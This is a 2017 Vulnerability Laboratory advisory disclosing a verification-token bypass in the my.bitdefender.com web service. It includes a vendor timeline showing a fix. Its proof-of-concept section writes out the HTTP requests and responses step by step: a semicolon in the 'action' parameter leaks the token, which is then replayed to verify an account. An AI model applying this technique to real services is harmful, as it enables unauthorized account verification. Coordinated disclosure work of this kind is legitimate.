Bit Defender Authentication Token Bypass

`Document Title:  
===============  
Bit Defender #39 - Auth Token Bypass Vulnerability  
  
  
References (Source):  
====================  
http://www.vulnerability-lab.com/get_content.php?id=1683  
  
  
Release Date:  
=============  
2017-01-09  
  
  
Vulnerability Laboratory ID (VL-ID):  
====================================  
1683  
  
  
Common Vulnerability Scoring System:  
====================================  
5.9  
  
  
Product & Service Introduction:  
===============================  
Bitdefender is a Romanian internet security software company, represented through subsidiaries and partners in over 100 countries.   
The company has been developing online protection since 2001. At September 2014 Bitdefender technologies were installed in around   
500 million home and corporate devices across the globe.  
  
(Copy of the Homepage: https://en.wikipedia.org/wiki/Bitdefender )  
  
  
Abstract Advisory Information:  
==============================  
An independent vulnerability laboratory researcher discovered a remote session token bypass vulnerability in the official Bitdefender online service web-application (my.bitdefender).  
  
  
Vulnerability Disclosure Timeline:  
==================================  
2016-01-25: Researcher Notification & Coordination (Lawrence Amer)  
2016-01-26: Vendor Notification (Bitdefender Security Team)  
2016-02-03: Vendor Response/Feedback (Bitdefender Security Team)  
2016-12-01: Vendor Fix/Patch by Check (Bitdefender Developer Team)  
2017-01-09: Public Disclosure (Vulnerability Laboratory)  
  
  
Discovery Status:  
=================  
Published  
  
  
Affected Product(s):  
====================  
Bitdefender  
Product: My Bitdefender - Online Service (Web-Application) 2016 Q1  
  
  
Exploitation Technique:  
=======================  
Remote  
  
  
Severity Level:  
===============  
High  
  
  
Technical Details & Description:  
================================  
A token bypass vulnerability has been discovered in the official Bitdefender online service web-application (my.bitdefender).  
The vulnerability allows remote attackers to bypass the secure protection mechanism of verification procedure in the online-service.  
  
A vulnerability allows remote attackers to bypass the token which responsible for confirming the owner of current email address to get a   
confirmed account from bitdefender for security products. The vulnerability considerd as method followed by remote attackers to bypass the   
correct method of verfication . and located in module which reponsible for registering new customers [/lv2/account?login=] . a semia col   
added to parameter [ action] which expose the verfication token , which used later for bypassing.  
  
The security risk of the token filter bypass web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 5.9.   
Exploitation of the token filter bypass web vulnerability requires no privileged user account or user interaction. Successful exploitation of the   
vulnerability results in unauthorized verification of user credentials in the online service web-application.  
  
Request Method:   
[+] GET  
  
Vulnerable Module:  
[+] /lv2/account?login=  
  
Vulnerable Parameter(s):  
[+] [action]  
  
Affected Domain(s):   
[+] my.bitdefender.com  
  
  
Proof of Concept (PoC):  
=======================  
The token bypass web vulnerability can be exploited by a remote attackers without privileged web-application user account or user interaction.  
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.  
  
Manual steps to reproduce the vulnerbility ...  
1. The remote attacker registers wih my.bitdefender.com , after registration the current status of un-verfied accounts is [4] while the [1] is verfied   
2. Now the attacker add a semia col to action parameter like: action=' with GET Request:   
  
GET /lv2/[email protected]&pass=[EMAIL_CURRENT_PASSWORD]&action=;&type=userpass&fp=web&lang=en_us&beta=true HTTP/1.1  
Host: my.bitdefender.com  
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0  
Accept: application/json, text/plain, */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: https://my.bitdefender.com/login  
Cookie: s_vi=[CS]v1|2B4FB32A051D2F01-6000190280001A6A[CE]; bd112=lY5LDoIwFEX30qQjCf1BsCTGgTp0BdYBlCpNLMXHI5gY9i4LYICzM7j35Ny%2BZIQXKUmL2JeGGTZNU1p7bNzDdY2D1MZg2ODRGXatfLewq8C2hh3fByoLqi5UnXx47gawVJ0%2Fu9g5gAgL9xBDj1TuCyr1MiQJQR%2FcgFXoSSmyXEnNVcHn5P8KGzusLBom1q1abLWu%2FQXncnPVWAePa54iU7nO5%2FsP; visid_incap_444053=meSoTqUSRwCAL8O9SNbIZW5zn1YAAAAAQUIPAAAAAABtAdmh8HM0LDXk6stcsU0R; __qca=P0-565467393-1453315617095; trh3=AWsAlP%2BVbGRto4xjbW6TbmNtrpFdWXiUbGZsrqZiVFl3VaWZpaacl5GIppdUb6VtZV5dS66go5iWaGZhVGKnpmaimGegW49ecWOVlaBqVWOWY3ZtVKiboJibl4qqo1Rvm21kXFhcb2xiaGdsbqWgpg%3D%3D; shsid=11947017; rerew4=W56TmuvVMT0%2BDwA%3D; oidfg4=m5qTnLt4AQA%3D; fsd2=m5qTnLt4AQA%3D; __cfduid=dd46406ce24e76b99369c3c1422d61a881453744387; _ga=GA1.3.875146899.1453769753; bdselcid=en; country_id=en; _country=sy; _cbml=%7B%22name%22%3A%22en_us%22%7D; _cbmrb=false; _cbme=%22%22; _cbmci=%22%22; _gat=1  
Connection: keep-alive  
  
  
3. Got this response which will leak the verfication token   
Response :   
HTTP/1.1 200 OK  
Server: cloudflare-nginx  
Date: Tue, 26 Jan 2016 01:31:41 GMT  
Content-Type: application/json  
Connection: keep-alive  
X-Frame-Options: SAMEORIGIN  
Strict-Transport-Security: max-age=63072000; includeSubdomains; preload  
X-Content-Type-Options: nosniff  
CF-RAY: 26a875b0da9f356c-LHR  
Content-Length: 229  
  
{  
"preferences": "{"lang": "en_us"}",   
"country_id": "204",   
"token": "2OZ6INMWmWythZEonNWQjsy4GtE",   
"error": "pending",   
"passmd5": "e807f1fcf82d132f9bb018ca6738a19f",   
"login": "[email protected]"  
}  
  
  
4. The last step is to use the token that was leaked from previous step  
  
GET /lv2/act_pending?token=2OZ6INMWmWythZEonNWQjsy4GtE&redirect_uri=https%3A%2F%2Fmy.bitdefender.com%2Fdashboard%3F HTTP/1.1  
Host: my.bitdefender.com  
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
  
--------------Response ---------------------------------------  
HTTP/1.1 302 FOUND  
Server: cloudflare-nginx  
Date: Tue, 26 Jan 2016 01:32:21 GMT  
Content-Type: text/plain; charset=utf-8  
Content-Length: 5  
Connection: keep-alive  
Location: https://my.bitdefender.com/dashboard?&token=7iS15Wa2Zn1Jl3U2WGtZhiE7ll8&[email protected]&passmd5=e807f1fcf82d132f9bb018ca6738a19f  
X-Frame-Options: SAMEORIGIN  
Strict-Transport-Security: max-age=63072000; includeSubdomains; preload  
X-Content-Type-Options: nosniff  
CF-RAY: 26a876a6c49a3530-LHR  
-  
Found  
  
  
  
Video PoC:   
https://www.youtube.com/watch?v=LPSYJPL3GZU  
  
  
Security Risk:  
==============  
The security risk of the session token bypass web vulnerability in the bitdefender web-application is estimated as high. (CVSS 5.9)  
  
  
Credits & Authors:  
==================  
Lawrence Amer - ( http://www.vulnerability-lab.com/show.php?user=Lawrence%20Amer )  
  
  
Disclaimer & Information:  
=========================  
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed   
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable   
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab   
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for   
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,   
policies, deface websites, hack into databases or trade with fraud/stolen material.  
  
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com  
Contact: [email protected] - [email protected] - [email protected]  
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact  
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab  
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php  
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/  
  
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to   
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by   
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website   
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact   
([email protected] or [email protected]) to get a permission.  
  
Copyright A(c) 2017 | Vulnerability Laboratory - [Evolution Security GmbH]aC/  
  
--   
VULNERABILITY LABORATORY - RESEARCH TEAM  
SERVICE: www.vulnerability-lab.com  
  
`